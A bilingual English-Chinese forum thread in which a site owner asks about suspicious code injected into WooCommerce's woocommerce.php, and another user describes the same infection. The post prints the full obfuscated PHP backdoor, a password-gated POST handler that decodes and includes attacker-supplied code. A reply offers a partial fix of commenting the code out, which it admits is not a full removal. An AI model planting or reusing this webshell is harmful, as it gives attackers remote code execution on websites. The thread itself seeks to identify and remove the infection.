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奇怪的代码被添加到 woocommerce.php 文件中

[英]Strange code being added to woocommerce.php file

I have found this strange code within the core woocommerce.php file.我在核心 woocommerce.php 文件中发现了这个奇怪的代码。

Does anyone understand what this code is trying to do?有谁明白这段代码试图做什么? I suspect it is malware as it is not part of the core WooCommerce code.我怀疑它是恶意软件,因为它不是核心 WooCommerce 代码的一部分。

I am trying to understand if it is being added by a plugin and is legitimate or if it is some form of virus/malware etc.我试图了解它是否由插件添加并且是合法的,或者它是否是某种形式的病毒/恶意软件等。

if (isset($_POST["_aey8iousjrkdf"],$_POST['WP_6cdd22']) && sha1($_POST['WP_6cdd22']) == "6cdd22ad6267ba73cd92bf8abd7ec2058740fa80") { $_oxyu = tempnam(sys_get_temp_dir(),"rlgalfarg"); file_put_contents($_oxyu,$_POST["_aey8iousjrkdf"]); require_once "php".":"."//filt"."e"."r/c"."onvert."."ba"."s"."e"."64-"."d"."e"."code/co"."n"."v"."er"."t.b"."a"."s"."e64-de"."co"."de/"."resou"."rce"."=".$_oxyu; unlink($_oxyu); die(); } 

Had same problemm with this woocommerce.php.这个 woocommerce.php 有同样的问题。 After removing code it just returning straight back.删除代码后,它会直接返回。 After researching and playing around I think I've found the way.在研究和玩耍之后,我想我找到了方法。 I have added /* just before "if" and all code turned into just a comment.我在“if”之前添加了/*,所有代码都变成了评论。 Now second day and nothing new returning to the place.现在第二天,没有什么新东西回到这个地方。 Of course this is not the best way to do it and I'm not sure if it will stay as a comment but so far seems to be ok.当然,这不是最好的方法,我不确定它是否会作为评论保留,但到目前为止似乎还可以。 If somebody can find full removal way please share with us here.如果有人可以找到完整的删除方式,请在此处与我们分享。

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